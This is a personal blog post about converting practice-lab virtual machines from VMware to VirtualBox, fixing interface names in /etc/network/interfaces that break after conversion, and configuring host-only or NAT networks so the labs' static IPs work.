VirtualBox and VMWare Workstation Player are common hypervisors. Most of the practice VMs I’ve found are designed and tested on one or the other. I have and use both. For the most part, using the hypervisor that the VM came in isn’t a problem. Occasionally, like a Linux pivoting lab I’m working on for The Hacker Playbook 3, I need to switch from one to the other. This lab involves a Linux environment where Peter Kim has set up static IPs on the VMs. To use it, you need to get your attack machine in the same range. I’ve not found a way to do this in the free VMWare Workstation Player. I’ve found that changing the IPs used when the designer specifies them often results in broken labs (or more trouble than their worth to fix labs).

This How-To Geek tutorial has solid instructions for converting between the two hypervisors. The only issue I ran into was getting the OVFTool open in the Windows command line. The easiest way should be to right-click in the folder where it is and use “Open command window here”. I didn’t have that option – I have open in PowerShell instead. The easiest adjustment for me was to copy the file path, open a command prompt, and just use cd "<copied filepath>".

Converting the files was simple and straightforward. Then it’s a matter of importing them into the appropriate hypervisor. But I found when I opened up the VM, the only connection I had was the loopback interface. For some reason, converting from a VMWare VM to a VirtualBox machine broke the networking. It took some creative googling to figure out what happened. The VMs for the lab were running Ubuntu that was recent enough to use Predictable Network Interface Names. These were different in the VMs after converting them to VirtualBox. A StackOverflow question had a solution that worked since creds were provided for the VMs. You do need sudo access, but it got the job done.

Basic steps:

  1. See what interfaces are available.

  2. Update the /etc/network/interfaces to reflect the appropriate interface name.

  3. Restart networking services by restarting VM or /etc/init.d/networking restart

  ip a # or ifconfig -a to see what interfaces are available
  sudo vi /etc/network/interfaces # enter sudo password and update file as needed
  /etc/ini.d/networking restart

The file will look something like:

  # The primary network interface
  auto enp0s3
  iface enp0s3 inet dhcp

Just switch out whatever your interface is for whatever is in the same location as enp0s3. Not a big deal to fix, but would be problematic without creds. Little nuances like this are why I keep the lab VM in the original format whenever I can. Learning how to convert and fix what breaks is valuable, but I’d prefer to spend that time working on my intended goals.

Specifying IP range in VirtualBox

Sometimes labs will specify the IP ranges to use. It’s not always necessary to change them, but if it’s a more complex lab where multiple VMs are setup as a network, I’ve found it works better to take the time to make the IPs match. You can configure the VM using command utilities or VirtualBox settings. This post from Debugging Code has walkthroughs for several options.

VirtualBox has a lot of options for connecting the VM to the Internet. I recommend reading through the documentation to get a better understanding of what you should use when. I keep my labs in host-only for the most part, using NAT for external labs, and occasionally the other settings. It’s a good idea to check the network settings on the VMs you import. Since most are vulnerable by design, you don’t want them exposed to the Internet.

The typical situation I’ve encountered is needing to get everything on the same range, so the static IPs setup in the downloaded VMs will function as expected. My preferred approach is to use the host-only adapter. Open up VirtualBox then use Global Tools > Host Network Manager. Then you can configure/create/remove adapters as needed. You can also use the NAT network option if you will need outbound connections. Open VirtualBox, then File > Preferences > Network. You can add and configure NAT Networks here. You add then network, and then configure it.

Both options are easy to do – you just need to decide which is the better option for your situation. If you aren’t sure what the settings mean or what you should do with things like DHCP, take some time to research the protocols and learn what you need to know to make your labs function.

Wrap Up

Working on labs is important, and labs are much more fun when they work properly. Since these are things I’ve run into, I wanted a quick write-up for my reference. Hopefully it might help others as well.

Happy labbing!

Disclaimer – don’t do illegal stuff, etc.